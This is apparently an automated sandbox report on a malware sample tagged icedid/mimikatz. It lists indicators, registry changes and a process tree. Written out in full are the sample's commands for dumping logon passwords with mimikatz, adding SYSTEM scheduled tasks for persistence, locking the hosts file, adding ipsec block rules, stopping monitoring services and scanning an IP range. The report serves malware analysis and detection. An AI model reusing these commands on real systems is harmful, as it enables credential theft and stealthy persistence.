\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zghnuwi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kcuyyg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hqnaebagm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1884 cmd.exe 3440 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b73-6.dat nsis_installer_2 behavioral2/files/0x000a000000023b80-15.dat nsis_installer_1 behavioral2/files/0x000a000000023b80-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zghnuwi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3440 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1716 schtasks.exe 864 schtasks.exe 4056 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3344 zghnuwi.exe Token: SeDebugPrivilege 772 zghnuwi.exe Token: SeDebugPrivilege 2852 vfshost.exe Token: SeDebugPrivilege 2964 eqelmsiua.exe Token: SeLockMemoryPrivilege 1236 indtey.exe Token: SeLockMemoryPrivilege 1236 indtey.exe Token: SeDebugPrivilege 2360 eqelmsiua.exe Token: SeDebugPrivilege 2408 eqelmsiua.exe Token: SeDebugPrivilege 3740 eqelmsiua.exe Token: SeDebugPrivilege 1524 eqelmsiua.exe Token: SeDebugPrivilege 4504 eqelmsiua.exe Token: SeDebugPrivilege 5100 eqelmsiua.exe Token: SeDebugPrivilege 3008 eqelmsiua.exe Token: SeDebugPrivilege 1120 eqelmsiua.exe Token: SeDebugPrivilege 2344 eqelmsiua.exe Token: SeDebugPrivilege 4968 eqelmsiua.exe Token: SeDebugPrivilege 1348 eqelmsiua.exe Token: SeDebugPrivilege 1220 eqelmsiua.exe Token: SeDebugPrivilege 4060 eqelmsiua.exe Token: SeDebugPrivilege 2300 eqelmsiua.exe Token: SeDebugPrivilege 3136 eqelmsiua.exe Token: SeDebugPrivilege 456 eqelmsiua.exe Token: SeDebugPrivilege 5092 eqelmsiua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe 3344 zghnuwi.exe 3344 zghnuwi.exe 772 zghnuwi.exe 772 zghnuwi.exe 4300 xohudmc.exe 3320 kcuyyg.exe 2968 zghnuwi.exe 2968 zghnuwi.exe 632 zghnuwi.exe 632 zghnuwi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1996 wrote to memory of 1884 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe 82 PID 1996 wrote to memory of 1884 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe 82 PID 1996 wrote to memory of 1884 1996 2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe 82 PID 1884 wrote to memory of 3440 1884 cmd.exe 84 PID 1884 wrote to memory of 3440 1884 cmd.exe 84 PID 1884 wrote to memory of 3440 1884 cmd.exe 84 PID 1884 wrote to memory of 3344 1884 cmd.exe 85 PID 1884 wrote to memory of 3344 1884 cmd.exe 85 PID 1884 wrote to memory of 3344 1884 cmd.exe 85 PID 772 wrote to memory of 232 772 zghnuwi.exe 87 PID 772 wrote to memory of 232 772 zghnuwi.exe 87 PID 772 wrote to memory of 232 772 zghnuwi.exe 87 PID 232 wrote to memory of 3128 232 cmd.exe 89 PID 232 wrote to memory of 3128 232 cmd.exe 89 PID 232 wrote to memory of 3128 232 cmd.exe 89 PID 232 wrote to memory of 1012 232 cmd.exe 90 PID 232 wrote to memory of 1012 232 cmd.exe 90 PID 232 wrote to memory of 1012 232 cmd.exe 90 PID 232 wrote to memory of 1688 232 cmd.exe 91 PID 232 wrote to memory of 1688 232 cmd.exe 91 PID 232 wrote to memory of 1688 232 cmd.exe 91 PID 232 wrote to memory of 2344 232 cmd.exe 92 PID 232 wrote to memory of 2344 232 cmd.exe 92 PID 232 wrote to memory of 2344 232 cmd.exe 92 PID 232 wrote to memory of 1968 232 cmd.exe 93 PID 232 wrote to memory of 1968 232 cmd.exe 93 PID 232 wrote to memory of 1968 232 cmd.exe 93 PID 232 wrote to memory of 5088 232 cmd.exe 94 PID 232 wrote to memory of 5088 232 cmd.exe 94 PID 232 wrote to memory of 5088 232 cmd.exe 94 PID 772 wrote to memory of 3600 772 zghnuwi.exe 95 PID 772 wrote to memory of 3600 772 zghnuwi.exe 95 PID 772 wrote to memory of 3600 772 zghnuwi.exe 95 PID 772 wrote to memory of 4344 772 zghnuwi.exe 97 PID 772 wrote to memory of 4344 772 zghnuwi.exe 97 PID 772 wrote to memory of 4344 772 zghnuwi.exe 97 PID 772 wrote to memory of 2140 772 zghnuwi.exe 99 PID 772 wrote to memory of 2140 772 zghnuwi.exe 99 PID 772 wrote to memory of 2140 772 zghnuwi.exe 99 PID 772 wrote to memory of 5044 772 zghnuwi.exe 108 PID 772 wrote to memory of 5044 772 zghnuwi.exe 108 PID 772 wrote to memory of 5044 772 zghnuwi.exe 108 PID 5044 wrote to memory of 3136 5044 cmd.exe 110 PID 5044 wrote to memory of 3136 5044 cmd.exe 110 PID 5044 wrote to memory of 3136 5044 cmd.exe 110 PID 3136 wrote to memory of 2976 3136 wpcap.exe 111 PID 3136 wrote to memory of 2976 3136 wpcap.exe 111 PID 3136 wrote to memory of 2976 3136 wpcap.exe 111 PID 2976 wrote to memory of 2820 2976 net.exe 113 PID 2976 wrote to memory of 2820 2976 net.exe 113 PID 2976 wrote to memory of 2820 2976 net.exe 113 PID 3136 wrote to memory of 548 3136 wpcap.exe 114 PID 3136 wrote to memory of 548 3136 wpcap.exe 114 PID 3136 wrote to memory of 548 3136 wpcap.exe 114 PID 548 wrote to memory of 4828 548 net.exe 116 PID 548 wrote to memory of 4828 548 net.exe 116 PID 548 wrote to memory of 4828 548 net.exe 116 PID 3136 wrote to memory of 2416 3136 wpcap.exe 117 PID 3136 wrote to memory of 2416 3136 wpcap.exe 117 PID 3136 wrote to memory of 2416 3136 wpcap.exe 117 PID 2416 wrote to memory of 2400 2416 net.exe 119 PID 2416 wrote to memory of 2400 2416 net.exe 119 PID 2416 wrote to memory of 2400 2416 net.exe 119 PID 3136 wrote to memory of 2300 3136 wpcap.exe 120
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2148
-
C:\Windows\TEMP\vuctsdlau\indtey.exe"C:\Windows\TEMP\vuctsdlau\indtey.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-12_fe0f8452b06a16543cc6b6b8aaa9a629_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uqrutnuy\zghnuwi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3440
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3344
-
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3128
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1968
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:5088
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3600
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\bliinatya\rtbnheisb\wpcap.exeC:\Windows\bliinatya\rtbnheisb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2820
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4828
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3448
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2968 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2084
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3268 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4928
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:440 -
C:\Windows\bliinatya\rtbnheisb\igadlieeu.exeC:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bliinatya\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1968 -
C:\Windows\bliinatya\Corporate\vfshost.exeC:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"2⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"2⤵PID:3840
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4056
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3400
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4544
-
-
